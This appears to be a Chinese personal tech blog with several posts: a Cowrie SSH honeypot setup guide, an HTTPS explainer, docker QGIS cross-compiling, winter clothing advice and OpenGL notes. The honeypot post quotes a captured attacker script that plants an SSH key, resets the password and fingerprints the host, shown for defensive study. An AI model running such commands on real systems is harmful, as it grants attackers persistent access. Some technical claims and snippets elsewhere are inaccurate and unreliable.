前言：自己的服务器ip隶属于公网ip，从地球上任何一个互联网角落都可以访问。这也导致了无数的脚本小子用爬虫结合弱口令爆破服务器。为了避免服务器被爆破，有很多方式，比如fail2ban封锁ip，或者最近比较流行的f2a验证方式，亦或者关闭密码登陆采用密钥登陆。然而这些方式都是被动防御，本文将介绍一种“赛博草船借箭”的方法用来薅黑客的羊毛：即搭建ssh蜜罐。将黑客的攻击ip，操作命令和密码记录下来，甚至可以反向攻击跳板服务器。

制作一个 SSH 蜜罐是一种常见的安全策略，用来检测并记录恶意攻击者的行为。一个简单的方法是使用现成的蜜罐工具，比如 `Cowrie`。这是一个非常流行的 SSH/Telnet 蜜罐，可以记录攻击者的每一步操作。



下面是使用 `Cowrie` 在 Linux 上搭建 SSH 蜜罐的步骤：

### 1. 安装依赖
首先，确保系统安装了所需的依赖：

```bash
sudo apt-get update
sudo apt-get install python3-virtualenv git libssl-dev libffi-dev build-essential python3-dev
```

### 2. 创建虚拟环境并安装 Cowrie
进入你想安装 Cowrie 的目录，然后克隆 Cowrie 的 GitHub 仓库：

```bash
git clone https://github.com/cowrie/cowrie.git
cd cowrie
```

接着，创建一个 Python 虚拟环境并激活它：

```bash
virtualenv cowrie-env
source cowrie-env/bin/activate
```

然后安装 Cowrie 的 Python 依赖：

```bash
pip install --upgrade pip
pip install -r requirements.txt
```

### 3. 配置 Cowrie
Cowrie 的默认配置文件位于 `cowrie.cfg.dist`。你需要复制并重命名为 `cowrie.cfg`：

```bash
cp etc/cowrie.cfg.dist etc/cowrie.cfg
```

编辑 `etc/cowrie.cfg` 文件，根据需要修改 SSH 蜜罐的配置。常见的修改项包括：

- **端口配置**：默认情况下，Cowrie 会监听 2222 端口。如果你想让它监听 22 端口（标准 SSH 端口），你需要将 Cowrie 配置为监听 22 端口，并将实际的 SSH 服务移动到另一个端口（例如 2222），以避免冲突。

  在配置文件中找到这一行：
  ```
  listen_endpoints = tcp:2222:interface=0.0.0.0
  ```
  改成：
  ```
  listen_endpoints = tcp:22:interface=0.0.0.0
  ```

- **日志配置**：Cowrie 记录所有交互行为，包括攻击者尝试执行的命令。你可以在 `cowrie.cfg` 中配置日志的存储位置。

### 4. 将真实 SSH 服务移动到其他端口（可选）
如果你希望 Cowrie 监听 22 端口，你需要将真实的 SSH 服务移动到其他端口。编辑 SSH 配置文件 `/etc/ssh/sshd_config`：

```bash
sudo nano /etc/ssh/sshd_config
```

找到 `Port 22`，并将其更改为另一个端口（例如 2222）：

```bash
Port 2222
```

保存并重新启动 SSH 服务：

```bash
sudo systemctl restart ssh
```

### 5. 启动 Cowrie
启动 Cowrie 蜜罐：

```bash
bin/cowrie start
```

你可以使用以下命令来检查 Cowrie 的运行状态：

```bash
bin/cowrie status
```

停止 Cowrie：

```bash
bin/cowrie stop
```

### 6. 监控和分析攻击者行为
Cowrie 会记录所有的攻击行为，包括攻击者尝试的用户名、密码，以及成功登录后的所有命令。你可以在 `log/` 文件夹中找到这些日志文件。常见的日志文件包括：

- `cowrie.log`：运行时的详细日志。
- `tty/`：保存攻击者执行的每个命令的详细交互。

你还可以将 Cowrie 配置为将日志发送到远程服务器进行集中管理和分析。

### 7. 加强蜜罐安全
为了确保攻击者不会破坏你的蜜罐，可以考虑以下措施：

- 将蜜罐隔离在专用网络中，限制其访问权限。
- 使用防火墙规则控制蜜罐的网络流量。
- 定期监控并更新蜜罐软件以修复潜在的安全漏洞。

### 总结
通过安装并配置 Cowrie，你可以轻松地搭建一个 SSH 蜜罐，记录并分析攻击者的行为。这种蜜罐能够帮助你发现潜在的安全威胁并研究攻击模式。

### 攻击案例
这里放一个别人上传到蜜罐中的执行脚本：

```bash
cd ~; chattr -ia .ssh; lockr -ia .ssh
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
cat /proc/cpuinfo | grep name | wc -l
echo -e "123456\nVvxRjniPhAHI\nVvxRjniPhAHI"|passwd|bash
Enter new UNIX password:
echo "123456\nVvxRjniPhAHI\nVvxRjniPhAHI\n"|passwd
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
ls -lh $(which ls)
which ls
crontab -l
w
uname -m
cat /proc/cpuinfo | grep model | grep name | wc -l
top
uname
uname -a
whoami
lscpu | grep Model
df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
```

### 补充（todo）
1.22端口无法直接启动蜜罐，需要用iptables转发
2.除了使用cowrie的ssh蜜罐，还可以使用一些成熟的蜜罐框架，不但有ssh蜜罐还有其他类型的蜜罐，比如wordpress的蜜罐，这里推荐**Hfish**。

赛博“草船借箭”，搭建ssh蜜罐，分析黑客攻击模式并获取别人的弱口令字典

总所周知，在浏览器中我们搜索某些网页打开的时候浏览器会弹出网站不安全的字样，like this：

![image.png](/static/img/637d1b1a1dfdb9b6044d0e21835209d7.image.webp)
这是为什么呢？因为我们和网站通讯使用的是未加密的http协议，与服务器之间采用明文通讯，如果在通讯链路中被监听的话，是可以看到访问内容和提交的表单。这就非常危险，如果提交表单当中包含隐私信息，比如账号密码。这就存在非常大的隐患，所以为了弥补这一缺陷，就出现了https协议。




https协议同时采用了**非对称加密**和**对成加密**，关于这两种加密的解释如下：

对称加密：使用同一个密钥进行加密和解密

非对称加密：使用一对密钥，公钥和私钥。公钥用于加密，私钥用于解密。

这两种加密方式各有利弊，比如对称加密只有一个密钥，对于密钥的管理非常重要，假如我发送一条信息：“123”，采用密钥加密后是“Ax34==/>”，那么如果被人接受到之后需要也有这个密钥才可以解析成123.但是如果密钥泄露了，也就意味着任何人都可以查看你的加密信息，**采用对称加密保证安全的核心在于妥善保管自己的密钥。**

使用非对称加密这是存在一个公钥和一个密钥，公钥负责加密，密钥负责解密。就像名字一样，公钥是可以公开的，让别人拿到后进行加密然后发送数据给你，你进行解密。但是你无法发送加密信息，除非你有对方的公钥。这种加密方式的好处是不用将自己的密钥传递给别人，泄露风险很小，别人拿到加密信息和公钥是无法破译数据的。

注意：这两种加密方式采用的算法都是有严格数学证明不可以被破译的，无法通过统计规律破译，数学上不存在反函数

下面来说一说https中的s的含义，其表示SSL，SSL（安全套接层）是一种用于保护网络通信的加密协议，确保数据在互联网上的安全传输。它通过加密数据，验证服务器身份，防止信息在传输过程中被窃取或篡改。

下面我们详细讲一下当我们访问服务器并采用ssl加密的流程：

- 当客户端向一个https网站发起请求：服务器会将SSL证书发送给客户端进行校验，SSL证书中包含一个公钥。校验成功后，客户端会生成一个随机串，并使用受访网站的SSL证书公钥进行加密，然后再发送给网站服务器。

- 网站服务器收到加密的随机串后：会利用自己的私钥进行解密，得到由客户端生成的随机串。服务器使用这一随机串，开始与客户端进行对称加密通信，客户端使用随机串对服务器发来的信息进行加密。

ssl的加密同时涉及两种加密方式，先使用非对称再使用对称加密，原因是非对称加密比较耗费计算资源。

SSL证书的工作流程分为三个部分：握手协议（Handshake protocol）、记录协议（Record protocol）、警报协议（Alert protocol）。 具体还涉及到CA证书颁发结构和CA证书信任链。实际上还是比较复杂的，包括当中还有防止内容被篡改的一些手段。
欲知后事如何，请待下回分解。

在web时代下，SSL是如何加密http协议的？如何保障网站访问的安全性

QGIS是一个开源的GIS软件，对于遥感测算，地图绘制，可视化地理数据有重要作用。并且经常面临二次开发的需求，下面将详细描述如何使用docker在linux上编译windows版本的应用程序。
注：本文写于大二时期，只有英文版本,并且当时英文写作水平有限😩



## Compiling QGIS with docker
### 1 Overview

This essay contains following four sections:
- installing docker on Linux Os
- using docker images
- using docker containers
- compiling QGIS inside docker container


If you had installed docker on your computer and comprehended the concept of docker container
and docker image. We recommend you read the fourth section directly.
### 2 Installing


Base centos:
```
$ sudo yum install docker-ce
```

Base ubuntu:
```
$ sudo apt-get install docker-ce docker-ce-cli containerd.io`
```

### 3 Docker Image

This section introduces methods of applying docker images and related terms. On the prompt
command type:
```
$ docker images
```


| REPOSITORY | TAG | IMAGE ID | CREATED | SIZE |
| --- | --- | --- |  --- | --- |
| ubuntu |  latest | xxx | 7days ago| xxMB|


Then you  will get the above, this command listed all localimages, where "REPOSITORY" is resource
of the image and "IMAGE ID" is an unique ID for every image that docker engine generate randomly.

"TAG" is a representation of different edition image. "SIZE" represents the size of image. The more
commands you run in the container, the bigger the image that from container commit(especially apt
upgrade!) .

When we want to utilize image provided by other people:
```
$ docker pull {repository:tag}
```

If you want to remove one of your images:
```
$ docker rm ubuntu
```

### 4 Docker Container

The container is just like sandboxes that can run applications inside, which is dynamic and able
to convert into images. To search all running containers, type the following:

```bash
$ docker ps
```

Then will get the following:

| CONTAINER ID | IMAGE  | COMMAND     | CREATED   | STATUS   | PORTS  | NAMES              |
|--------------|--------|-------------|-----------|----------|--------|--------------------|
| xxx          | ubuntu | "bin/bash"  | 7 days ago| EXIT(0)  | xx:xx  | generate randomly  |


To list all containers, including running and suspended containers, use:

```bash
$ docker ps -a
```

To start a container:

```bash
$ docker run -i -t {image_id} /bin/bash
```

* **\-i**: Standard input and output.
* **\-t**: Terminal.
* **/bin/bash**: Automatically executes the command inside the container.

Alternatively, you can use:

```bash
$ docker exec -it {container_name} /bin/bash
```

This keeps the container in the "UP" status, even if you use the `exit` command inside.

### 5\. Start to Compile QGIS

This section describes how to build the QGIS project using Docker. Assuming you have Docker installed:

1. Pull the image with Mingw dependencies from the official repository:

   ```bash
   $ docker pull ghcr.io/qgis/qgis/qgis3-mingw-buildenv-stages:1
   ```

2. Run a container on this image and keep it running:

   ```bash
   $ docker run -it ghcr.io/qgis/qgis/qgis3-mingw-buildenv-stages:1 /bin/bash
   ```

3. To exit the container:

   ```bash
   $ exit
   ```

4. Restart the container:

   ```bash
   $ docker restart {container_name}
   ```

   Replace `{}` with the container name or ID.

5. Copy QGIS project files into the running container:

   ```bash
   $ docker cp ./QGIS {container_name}:/workspace
   ```

6. Enter the container and change the directory:

   ```bash
   $ docker exec -it {container_id} /bin/bash
   # cd /workspace/QGIS/ms-windows/mingw
   ```

7. Run the build shell scripts:

   ```bash
   # ./build.sh
   ```

8. After a while, a `/dist` folder will be generated. Compress and copy it to the host system:

   ```bash
   # tar -cvfz dist.tar.gz ./dist
   # exit
   ```

9. Finally, download the compressed file to the Windows system using the "sftp" protocol.

使用docker交叉编译QGIS

青岛只有夏季和冬季 --不知道谁说的

随着日历翻到10月，天气逐渐转凉，我也开始增添衣物。往年都是自己被冻到发抖的时候才想起买点厚衣服，不知道怎么穿，不知道怎么买，导致我在青岛冬天的幸福指数始终不高。因为经常被低温和大风折磨。每年买的厚衣服基本上穿一次就不想穿了，经常季抛。今年决定好好生活，改变一下往年的穿衣搭配，讲究一个科学御寒，本文将尽可能详细的描述秋冬季穿搭，包括冬季跑步的穿搭。




冬季穿衣主打一个**多层次**， 多层的衣服中间存在一个空气层，可以有效的保温和隔离寒冷。与之相反的穿法就是一件厚厚的羽绒服+一件薄薄长袖衫，这样虽然方便，室内可以脱掉羽绒服，室外穿上，但是实际的保温效果其实一般般，尤其是青岛的大风天气。

于我而言，希望冬天也可以跑跑步，为了避免跑完步后出汗带来的失温风险，多层搭配需要一定的讲究。运动型多层次穿衣主要分为3层：
1. 速干层
2. 保暖层
3. 额外保暖层（可选）
4. 隔离层

速干层的主要特点是：轻薄，吸汗，非棉。目的是运动后能够迅速排走湿气，蒸发汗液。
保暖层则一般是卫衣，不过最好买运动型卫衣，避免棉材质的卫衣，因为这一层的保暖卫衣也要承担一定的汗水蒸发功能
额外保暖层则是在非常低的温度下或者大风天气补充的保暖，可以选择羽绒马甲或者棉服。
隔离层则是对抗青岛大风的主要手段，一般选择运动夹克，具备防风和防水。不过透气比较差，因为防风和透气难以兼得，考虑到青岛海边的气候，尽量还是选择防风较好的夹克才可以更好的保暖。

对于下半身来说相对简单，穿一条速干打底裤+运动裤即可。如果不运动的话也可以穿保暖内裤+运动裤。

此外根据温度和风级选择一定的“配件”，比如手套和帽子，这样可以有效的减少皮肤裸露层度，降低身体与环境的热量交换。

最后附上一张跑步穿搭指示图：

![image.png](/static/img/f225677f0179fa7fd7bc3d02fcf7e077.image.webp)

青岛秋冬季穿衣指南

# OpenGL 学习笔记

### 配套使用的库

**GLAD** **(OpenGL Extension Wrangler)**：一个用于加载 OpenGL 扩展的库,管理OpenGL的指针和上下文

**GLFW(Graphics Library Framework)**：是一个用于创建窗口和处理用户输入的库




## 基础渲染窗口流程

1. 初始化GLFW窗口配置，比如使用GL的版本和模式
2. 使用GLFW创建窗口，设置窗口尺寸
3. 使用GLFW设置窗口环境，和编写窗口改变的回调函数(optional)
4. 使用GLAD加载所有GL的函数指针
5. 在窗口渲染循环中，编写渲染逻辑：比如交换帧缓冲区，监听输入



## 渲染三角形

### 关键词

* 顶点数组对象：Vertex Array Object，VAO
* 顶点缓冲对象：Vertex Buffer Object，VBO
* 元素缓冲对象：Element Buffer Object，EBO 或 索引缓冲对象 Index Buffer Object，IBO

图形渲染管线：3D坐标转为2D坐标的处理过程，第一部分把你的3D坐标转换为2D坐标，第二部分是把2D坐标转变为实际的有颜色的像素。

着色器：GPU上有很多个核心，每个核心上都有渲染管线的程序，程序就叫着色器。OpenGL着色器是用OpenGL着色器语言(OpenGL Shading Language, **GLSL**)写成的。

顶点着色器(Vertex Shader):它把一个单独的顶点作为输入。顶点着色器主要的目的是把3D坐标转为另一种3D坐标，同时顶点着色器允许我们对顶点属性（颜色）进行一些基本处理

图元(Primitive)：决定顶点数据渲染的类型，可以是点，线，三角形。e.g:GL_POINTS、GL_TRIANGLES、GL_LINE_STRIP。

几何着色器(Geometry Shader):几何着色器把图元形式的一系列顶点的集合作为输入，它可以通过产生新顶点构造出新的（或是其它的）图元来生成其他形状。例子中，它生成了另一个三角形。

光栅化阶段(Rasterization Stage):这里它会把图元映射为最终屏幕上相应的像素，生成供片段着色器(Fragment Shader)使用的片段(Fragment)。在片段着色器运行之前会执行裁切(Clipping)。裁切会丢弃超出你的视图以外的所有像素，用来提升执行效率。

片段着色器:主要目的是计算一个像素的最终颜色，这也是所有OpenGL高级效果产生的地方。通常，片段着色器包含3D场景的数据（比如光照、阴影、光的颜色等等），这些数据可以被用来计算最终像素的颜色。

Alpha测试和混合(Blending):这个阶段检测片段的对应的深度（和模板(Stencil)）值（后面会讲），用它们来判断这个像素是其它物体的前面还是后面，决定是否应该丢弃。这个阶段也会检查alpha值（alpha值定义了一个物体的透明度）并对物体进行混合(Blend)。所以，即使在片段着色器中计算出来了一个像素输出的颜色，在渲染多个三角形的时候最后的像素颜色也可能完全不同。

### 渲染管线流程

![image-20240123155408794.png](/static/img/acea97b3739fe2c51ea607ad8dc545c4.image-20240123155408794.webp)


对于大多数场合，我们只需要配置**顶点和片段着色器**就行了。**几何着色器**是可选的，通常使用它默认的着色器就行了。（图中蓝色的部分是可以人为修改的）

**标准化设备坐标(Normalized Device Coordinates, NDC)**:顶点坐标已经在顶点着色器中处理过，它们就应该是**标准化设备坐标**了。OpenGL仅当3D坐标在3个轴（x、y和z）上-1.0到1.0的范围内时才处理它。(0, 0)坐标是这个图像的中心，而不是左上角

### 正式开始渲染

假设我们现在要渲染一个物体在屏幕中，首先必须要有物体的顶点坐标。然后至少要有一个顶点shader程序和一个片段shader程序。在顶点着色器中，**只需要关注输入的数据处理**，顶点坐标是输入，需要对输入的顶点向量处理和解释。在片段着色器中，**不需要关注输入，只需要关注输出**：光栅化后的像素最后应该是什么颜色（光照和反射导致颜色变化）。

### 准备数据

在渲染前，还有一个工作：将顶点数据发送给显卡，缓存在显存中。这个步骤涉及到VBO（顶点缓冲对象，类似一个3D模型的顶点组成的顶点数组对象）

```c++
unsigned int VBO = glGenBuffers(1, &VBO);
```

以上代码表示生成一个VBO并赋予一个独一无二的ID，此时并没有数据。

```c++
glBindBuffer(GL_ARRAY_BUFFER, VBO);  
```

以上代码将VBO绑定到GL_ARRAY_BUFFER类型的缓冲区，每种缓冲区只能绑定一个缓冲对象，OpenGL中有多种类型的缓冲区，每种类型的缓冲区都有特定的用途。**GL_ARRAY_BUFFER类型的缓冲区用于存储顶点属性数据，如顶点坐标、法线、颜色等**。**GL_ELEMENT_ARRAY_BUFFER**用于存储图元索引数据，比如绘制三角形、四边形等的顶点索引。还有纹理缓冲区等等。

接下来就是将顶点数据**拷贝到绑定的缓冲区**，通过以下函数实现：

```c++
glBufferData(GL_ARRAY_BUFFER, sizeof(vertices), vertices, GL_STATIC_DRAW);
```

如果要更换绑定的缓冲对象，就需要调用以下函数实现解绑的效果：

```c++
glBindBuffer(GL_ARRAY_BUFFER, 0);  
```

现在我们已经把顶点数据储存在显卡的内存中，用VBO这个顶点缓冲对象管理。

从以上代码来看啊，每次绘制一个物体都需要绑定缓冲区，然后解释顶点数据。不同对象的解释方法不同，为了简便操作，出现了VAO。 

VAO并不是必须的，VBO可以独立使用，VBO缓存了数据，而数据的使用 方式（glVertexAttribPointer 指定的数据宽度等信息）并没有缓存，VBO将顶点信息放到GPU中，GPU在渲染时去缓存中取数据，二者中间的桥梁是GL-Context。GL-Context整个程序一般只有一个，所以如果一个渲染流程里有两份不同的绘制代码，当切换VBO时（有多个VBO时，通过glBindBuffer切换 ），**数据使用方式信息就丢失了**。而GL-context就负责在他们之间进行切换。这也是为什么要在渲染过程中，在每份绘制代码之中会有glBindbuffer、glEnableVertexAttribArray、glVertexAttribPointer。VAO记录该次绘制所需要的所有VBO所需信息，把它保存到VBO特定位置，绘制的时候直接在这个位置取信息绘制。　

 VAO为我们解决了这个大麻烦，当配置顶点属性数据的时候，只需要将配置函数调用执行一次，随后再绘制该物体的时候就只需要绑定相应的VAO即可，这样，我们就可以通过绑定不同的VAO（提醒，与VBO一样，同一时刻只能绑定一个VAO），使得在不同的顶点数据和属性配置切换变得非常简单。VAO记录的是一次绘制中所需要的信息，这包括“数据在哪里glBindBuffer”、“数据的格式是怎么样的glVertexAttribPointer”、shader-attribute的location的启用glEnableVertexAttribArray。

### 顶点着色器

着色器根据渲染端的不同使用不同的语言，openGL使用GLSL语言，比较接近C语言。下面给出顶点着色器的代码，可以用字符串表示，也可以用文件存放并加载。

```glsl
#version 330 core layout (location = 0) in vec3 aPos; 
void main() 
{    gl_Position = vec4(aPos.x, aPos.y, aPos.z, 1.0); }
```







【1】https://blog.csdn.net/p942005405/article/details/103770259

【2】https://learnopengl-cn.github.io/01%20Getting%20started/04%20Hello%20Triangle/

opengl基础

Welcome to my tech blog! Here, I document my coding journey and explore various technologies, focusing on practical solutions and streamlined techniques. From programming insights to tool recommendations, I share hands-on experiences that help sharpen your skills. Let’s learn and grow together!